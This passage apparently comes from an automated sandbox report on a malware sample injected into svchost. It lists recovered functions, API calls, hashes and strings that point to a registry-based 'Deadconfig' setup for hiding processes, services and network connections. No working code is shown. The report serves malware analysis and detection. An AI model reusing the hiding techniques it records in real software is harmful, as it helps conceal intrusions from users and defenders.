                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 65b7e96918c5d13549ca4f3715c852b3524a5d3d4346eb6d8267ab721b452ad3
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 16113A32614B84C2EB618F25E54435DBBA4F798B94F588220EE8C17BA9DF3DC5518B00
                                                        Function 0000026A879CD77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: 5f10548da1aafae449b39f266b465961ba97e9037fa842d887f3319dc1a15934
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: F3F05E35604B5081EBD49B51B54869D7E64AB88BD0F544125AE4923BA4DE3AC485CB02
                                                        Function 0000026A879CD728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 0000026A879CD751
                                                        • TlsSetValue.KERNEL32(?,?,?,0000026A879CB50E,?,?,?,0000026A879CB969,?,?,?,?,0000026A879CBA1D), ref: 0000026A879CD768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 7f2d1068c69fd1daaa2840e56ee522c4cf992a8f544c30cc10a58f7712e20314
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: E1E092B5604600D1FED48B60F94C2DC7E72BBC8780F588126E909273E4DE3AC856CB02
                                                        Function 0000026A879C1C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 8802ff9419eae7743a3a0ef74dac876a4928fd54d24e081a1a60cd4df4e39084
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: E111A371A40B9181EE55CB66940815DBBB0FBC8FA1F598214DE5D63794FE39C042CB04
                                                        Function 0000026A879C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 2c48dc19e786c3eb72415be0286c5c0383a1706879dfe082f89047f98b56d407
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: E5E03231A01A02C6F748CBA2D80C3493FE1EB98B0AF488024890D07760DF7EC4998B81
                                                        Function 0000026A879C1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 7c9554ebe337213b1a6bf704eb19815aaf95e40af5af9b43b49e71941156e171
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 25E0E571611A41C6F748DB62D80C25D7FB1FB98B16F888024C90D07B24EE3A84998A11

                                                        Executed Functions

                                                        Function 00000179537A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: fd83984981116aed06685cbe97e3da0b5b2e6a9a462ecd18c27b458a06e19b63
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: DFE03931A01A1486F7058BA6D82838937F5EB89B09F068026890907350EF7D84DD8740
                                                        Function 00000179537A3618 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 00000179537A3631
                                                        • PathFindFileNameW.SHLWAPI ref: 00000179537A3640
                                                          • Part of subcall function 00000179537A3C70: StrCmpNIW.KERNELBASE(?,?,?,00000179537A255A), ref: 00000179537A3C88
                                                          • Part of subcall function 00000179537A3BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3BC6
                                                          • Part of subcall function 00000179537A3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3BF4
                                                          • Part of subcall function 00000179537A3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3C16
                                                          • Part of subcall function 00000179537A3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3C34
                                                          • Part of subcall function 00000179537A3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000179537A3657), ref: 00000179537A3C55
                                                        • CreateThread.KERNELBASE ref: 00000179537A3687
                                                          • Part of subcall function 00000179537A1D3C: GetCurrentThread.KERNEL32 ref: 00000179537A1D47
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: de24395b8c1a38dc45c7b3a3b1ac26e3373c402ab4f74e848d58820298ab377d
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: C3115230E3C63042F7A6AFA0A9193DA17B1F75734DF904917A81E86BD4EF78C14C8600
                                                        Function 00000179537A3C70 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 19 179537a3c70-179537a3c7b 20 179537a3c95-179537a3c9c 19->20 21 179537a3c7d-179537a3c90 StrCmpNIW 19->21 21->20 22 179537a3c92 21->22 22->20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dead
                                                        • API String ID: 0-1293411866
                                                        • Opcode ID: 6fb73889c1581f2e1b76d9bdaa8d74932699fe8d643b78f0f876c7c0ad846881
                                                        • Instruction ID: e51760706036231befb810831e180465e36e38ee26d31d1285eafa68599e5b95
                                                        • Opcode Fuzzy Hash: 6fb73889c1581f2e1b76d9bdaa8d74932699fe8d643b78f0f876c7c0ad846881
                                                        • Instruction Fuzzy Hash: 2AD05E30B25A5986FF569FE188A42A123B0EB05708F888026D9090A744FB18898D8A10
                                                        Function 0000017953772AB8 Relevance: 1.7, APIs: 1, Instructions: 241libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: ebb275aeddb53b213d2c35c48b3707ba1f48d8465785839e46d0e873d6136234
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 04912372B052A087EB66CF25D044BADB3F1F759B9CF548126DE6E17788DA38D84AC700
                                                        Function 00000179537A1AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000179537A1628: GetProcessHeap.KERNEL32 ref: 00000179537A1633
                                                          • Part of subcall function 00000179537A1628: HeapAlloc.KERNEL32 ref: 00000179537A1642
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16B2
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DF
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A16F9
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1719
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1734
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1754
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A176F
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A178F
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17AA
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17CA
                                                        • SleepEx.KERNELBASE ref: 00000179537A1AE3
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17E5
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1805
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1820
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1840
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A185B
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A187B
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1896
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A18A0
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: e371bbdcb710b3b1f3bd7141db62182442529be2e2552f900b02f707f6bd5434
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 0A214175F2862086FB539B23E9513E913F9AB86BC8F8454239E0D877D5FF20C8598600
                                                        Function 00000179537AB980 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • HeapAlloc.KERNEL32(?,?,00000000,00000179537AB521,?,?,?,00000179537AB969,?,?,?,?,00000179537ABA1D), ref: 00000179537AB9D5
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        • Opcode ID: 49727549add3322cc68842f1d13a6e156a3df9b4bb079db6988531afba47aa00
                                                        • Instruction ID: 1c40080099cc52d3c9dcca413355167f472cffc1f754622ae68ff761bb1d5343
                                                        • Opcode Fuzzy Hash: 49727549add3322cc68842f1d13a6e156a3df9b4bb079db6988531afba47aa00
                                                        • Instruction Fuzzy Hash: 74F0B430B2D724C0FE575BA698623E513F46B8BB88F1C14334D0E863D2EE1CC48C8210
                                                        Function 00000179537AAF2C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • HeapAlloc.KERNEL32(?,?,FFFFFFFD,00000179537ACB34,?,?,?,?,00000000,?,?,00000179537ACDAA), ref: 00000179537AAF6A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        • Opcode ID: eabd024f12aa82453ee564882910b13ac1f2febc2a6eec2d2d3d6cb5c1003b12
                                                        • Instruction ID: 51bd3cb2eabd572575b63a283e9cbfc54843773de3296f8d08a0071726e54ed0
                                                        • Opcode Fuzzy Hash: eabd024f12aa82453ee564882910b13ac1f2febc2a6eec2d2d3d6cb5c1003b12
                                                        • Instruction Fuzzy Hash: 95F08271B3CA6881FE9A17B258517F513B04F467A8F0806226C2E863C2EA28C4488610

                                                        Non-executed Functions

                                                        Function 00000179537A81B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: c98caccae00ad8e6a31e9f00c42efeafa6666d66ff6067c2c6d952f6ec1815dd
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: EC316D72619B90DAEB618F60E8507EE7770F789748F44402ADA8E47B98EF38C64CC710
                                                        Function 00000179537AB62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 58d5a3877f2971adb160d580c45db64ddee175af295985bb9f243493a48143d3
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 25318032618F9096EB61CF65E8507DE73B0F78A758F540116EA8D43BA4EF38C159CB00
                                                        Function 000001795377B150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 65473043afd4ccdccb754a68518eafa20becd055afe61dc9edf888d91a074527
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: A451A172B15BA485EF16DFA698006ED27F1F75ABDCF444526EE1D17B86DA38C049C300
                                                        Function 00000179537A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: f6e1de72a24323e2c5da371c4544f58b4e3702e796ff59a300745ef8d2f0d468
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: C5711F36B28E2885FB12AF66E8606D937B5FB86B8CF401112DD4D47B68EF38C448C740
                                                        Function 00000179537A1D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00000179537A1D47
